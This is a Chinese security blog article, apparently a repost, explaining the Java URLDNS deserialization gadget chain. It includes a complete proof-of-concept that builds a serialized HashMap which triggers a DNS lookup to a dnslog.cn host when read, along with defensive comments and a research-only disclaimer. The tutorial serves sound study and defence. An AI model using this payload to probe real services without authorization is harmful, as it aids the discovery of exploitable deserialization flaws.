Java安全之URLDNS链分析
前言
Java反序列化
package com.garck3h.Javasecure;
/**
* Created by IntelliJ IDEA.
*
* @Author Garck3h
* @Date 2023/7/17 11:17 上午
* Life is endless, and there is no end to it.
**/
import java.io.*;
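public class SerializeDemo {

    /**
     * Round-trips a {@link Person} through Java native serialization: writes it
     * to {@code person.bin}, reads it back from the same file and prints both fields.
     *
     * @param args ignored
     */
    public static void main(String[] args) {
        // The object to serialize
        Person person = new Person("Alice", 25);
        // Serialize the person object to person.bin
        serialize(person, "person.bin");
        // Deserialize the object back from person.bin
        Person deserializedPerson = deserialize("person.bin");
        // deserialize() reports failure by returning null; the original
        // dereferenced the result unconditionally and would have thrown NPE here.
        if (deserializedPerson == null) {
            System.err.println("Deserialization of person.bin failed; nothing to print");
            return;
        }
        // Print the fields of the deserialized object
        System.out.println("Name: " + deserializedPerson.getName());
        System.out.println("Age: " + deserializedPerson.getAge());
    }

    /**
     * Serializes {@code object} into {@code fileName} with an {@link ObjectOutputStream}.
     * Failures are printed to stderr and otherwise ignored (best effort, as in the original).
     *
     * @param object   object graph to write; must be {@link Serializable}
     * @param fileName destination path, created or truncated
     */
    private static void serialize(Object object, String fileName) {
        try (FileOutputStream fos = new FileOutputStream(fileName);
             ObjectOutputStream oos = new ObjectOutputStream(fos)) {
            oos.writeObject(object);
            System.out.println("Object serialized to " + fileName);
        } catch (IOException e) {
            e.printStackTrace();
        }
    }

    /**
     * Reads one object from {@code fileName} and returns it as a {@link Person}.
     *
     * <p>SECURITY: {@code ObjectInputStream.readObject()} instantiates whatever
     * classes the stream names (and runs their {@code readObject} hooks) before
     * the type check below ever executes, so this helper must only be pointed at
     * a file this program wrote itself, never at bytes from an untrusted source.
     * On Java 9+ an {@code ObjectInputFilter} that allows only {@code Person}
     * would enforce that; it is not used here to keep the demo at the Java 7
     * level the rest of the file is written against.
     *
     * @param fileName path of a file previously produced by {@link #serialize}
     * @return the deserialized Person, or {@code null} if the file could not be
     *         read, names an unknown class, or does not contain a Person
     */
    private static Person deserialize(String fileName) {
        try (FileInputStream fis = new FileInputStream(fileName);
             ObjectInputStream ois = new ObjectInputStream(fis)) {
            Object read = ois.readObject();
            // Explicit check instead of a blind cast so a foreign object is
            // reported rather than surfacing as a ClassCastException.
            if (read instanceof Person) {
                return (Person) read;
            }
            System.err.println("Unexpected object in " + fileName + ": "
                    + (read == null ? "null" : read.getClass().getName()));
            return null;
        } catch (IOException | ClassNotFoundException e) {
            e.printStackTrace();
            return null;
        }
    }

    /** Serializable value type with two fields, name and age. */
    private static class Person implements Serializable {
        // Pinned so the stream format does not silently change when the class is edited
        private static final long serialVersionUID = 1L;

        private final String name;
        private final int age;

        public Person(String name, int age) {
            this.name = name;
            this.age = age;
        }

        public String getName() {
            return name;
        }

        public int getAge() {
            return age;
        }
    }
}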
URLDNS
利用链:
HashMap.readObject(ObjectInputStream in)
HashMap.putVal()
HashMap -> hash()
URL -> hashCode()
URLStreamHandler -> hashCode()
URLStreamHandler -> getHostAddress()
URL -> getHostAddress()
InetAddress -> getByName()
package com.garck3h.Javasecure;
/**
* Created by IntelliJ IDEA.
*
* @Author Garck3h
* @Date 2023/7/17 11:12 上午
* Life is endless, and there is no end to it.
**/
import java.io.*;
import java.lang.reflect.Field;
import java.net.URL;
import java.util.HashMap;
/**
 * Builds the URLDNS gadget-chain payload described in the article and then
 * deserializes it locally to show the trigger.
 *
 * What a defender should take from this: the only work the payload does on
 * {@code ObjectInputStream.readObject()} is HashMap.readObject -> putVal ->
 * hash -> URL.hashCode -> URLStreamHandler.hashCode -> getHostAddress ->
 * InetAddress.getByName, i.e. a single outbound DNS lookup for the embedded
 * host name and nothing else. That is why it is used as a low-impact probe for
 * "does this endpoint deserialize untrusted bytes", and why an unexpected DNS
 * query from a Java service right after it parsed client input is a useful
 * detection signal. The fix is on the consumer side: do not deserialize
 * untrusted data, or on Java 9+ install an ObjectInputFilter that rejects
 * java.net.URL and any other class the application does not expect.
 */
public class demo {
/**
 * Writes the payload to ser.bin, then reads it back so the lookup fires.
 *
 * @param args ignored
 * @throws Exception any reflection or I/O failure is propagated unchanged
 */
public static void main(String[] args) throws Exception {
// Instantiate a HashMap and a URL object (raw HashMap type kept as in the original)
HashMap hashMap = new HashMap();
// Host name as given in the article; the lookup for it is the observable side effect
URL url = new URL("http://cm1b9l.dnslog.cn");
// Reflectively open URL's private cached hashCode field so it can be overwritten
Field hashCodeField = url.getClass().getDeclaredField("hashCode");
hashCodeField.setAccessible(true);
// Set the cache to 0 first: URL.hashCode() returns the cached value whenever it is
// not -1, so HashMap.put() below does not resolve the host while the payload is built
hashCodeField.set(url, 0);
hashMap.put(url, null);
// Now reset it to -1 ("not yet computed") so that the hash is recomputed, and the
// name resolution happens, when HashMap.readObject() re-inserts the key on the
// deserializing side
hashCodeField.set(url,-1);
// Serialize the map to ser.bin (the original comment said "deserialize" here; this is
// the serialization step). NOTE(review): not try-with-resources, so the stream is
// leaked if writeObject throws.
ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream(new File("ser.bin")));
oos.writeObject(hashMap);
oos.close();
System.out.println("序列化成功");
// Deserialize the file to trigger the DNS resolution. This readObject() call is the
// exact operation a vulnerable consumer performs on attacker-supplied bytes.
ObjectInputStream oosin = new ObjectInputStream(new FileInputStream("ser.bin"));
oosin.readObject();
oosin.close();
System.out.println("反序列化成功");
}
}
Ysoserial.URLDNS
参考
原文始发于微信公众号(pentest):Java安全之URLDNS链分析
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。